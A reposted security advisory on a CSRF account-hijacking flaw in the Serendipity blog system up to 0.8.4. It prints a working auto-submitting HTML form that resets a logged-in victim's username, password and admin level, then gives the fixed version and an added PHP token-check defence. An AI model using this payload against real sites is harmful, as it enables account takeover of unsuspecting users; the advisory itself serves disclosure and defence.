
[Repost] Serendipity Account Hijacking and CSRF Vulnerability


Article author: Nenad Jovanovic

Summary
Serendipity is "a weblog/blog system, implemented with PHP. It is standards compliant, feature rich and open source (BSD License)".



A security vulnerability has been discovered in Serendipity that allows accounts to be hijacked by using a CSRF technique.

Credit:
The information has been provided by Nenad Jovanovic.

Details
Vulnerable Systems:
* Serendipity versions 0.8.4 and prior

Immune Systems:
* Serendipity version 0.8.5

An attacker is able to change the username and password of a logged-in user (and can therefore hijack his account) by tricking the user into clicking a link to a page with the following contents:

<form
action="http://your-server/path-to-s9y/serendipity_admin.php?serendipity[adminModule]=personal&serendipity[adminAction]=save"
method="post">
<input type="text" name="username" value="evilguy" />
<input type="text" name="password" value="evilpass" />
<input type="text" name="realname" value="John Doe" />
<input type="text" name="userlevel" value="255"/>
<input type="text" name="email" value="john@example.com" />
<input type="text" name="lang" value="en"/>
<input type="submit" name="SAVE" value="Save" />
</form>

<script type="text/javascript">
document.forms[0].submit();
</script>

The fields "your-server" and "path-to-s9y" in the form's action attribute have to be adjusted accordingly.

Similar attacks (termed as "Cross-Site Request Forgery" or CSRF) can be launched for performing other requests disguised as the victim. However, this problem is not limited to Serendipity, but affects a large number of comparable web applications available at this time.

Solution:
Version 0.8.5 of Serendipity is reported by the developers to fix the Account Hijacking vulnerability as well as the general CSRF problem itself.
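As an added illustration of the kind of fix the Solution refers to (this is example code written for this repost, not Serendipity's actual 0.8.5 patch; the names csrf_token and csrf_check are assumed), a synchronizer-token check in PHP that would reject the auto-submitted form shown above:

```php
<?php
// Added example (not Serendipity's own code): a synchronizer-token
// defence against the account-hijacking CSRF described in the advisory.
// csrf_token() and csrf_check() are assumed names for illustration.

session_start();

// Issue one unpredictable token per session and embed it as a hidden
// field in every state-changing form the application renders.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Reject a POST that does not carry the session's token. An attacker's
// page cannot read the victim's token (same-origin policy), so a forged
// cross-site form submission fails this check.
function csrf_check(array $post, array $server): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return true; // only state-changing requests need the token
    }
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    if ($expected === '' || !is_string($given)) {
        return false;
    }
    // Constant-time comparison so the token cannot leak via timing.
    if (!hash_equals($expected, $given)) {
        return false;
    }
    // Defence in depth: when the browser sends an Origin header it must
    // name this site; a forged request carries the attacker's origin.
    if (isset($server['HTTP_ORIGIN'])) {
        $origin = parse_url($server['HTTP_ORIGIN'], PHP_URL_HOST);
        $host   = strtok($server['HTTP_HOST'] ?? '', ':'); // drop any port
        if ($origin === false || $origin === null || $origin !== $host) {
            return false;
        }
    }
    return true;
}

// Usage at the top of the "personal settings" save handler:
if (!csrf_check($_POST, $_SERVER)) {
    http_response_code(403);
    exit('Invalid CSRF token');
}
// ... proceed with the username/password update ...

// In the form template, emit the token alongside the other fields:
// echo '<input type="hidden" name="csrf_token" value="'
//    . htmlspecialchars(csrf_token()) . '" />';
```

The check has to cover every action that changes state (here the personal-settings save), not only the login form, since the forged request in this advisory is made with the victim's already-authenticated session cookie.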
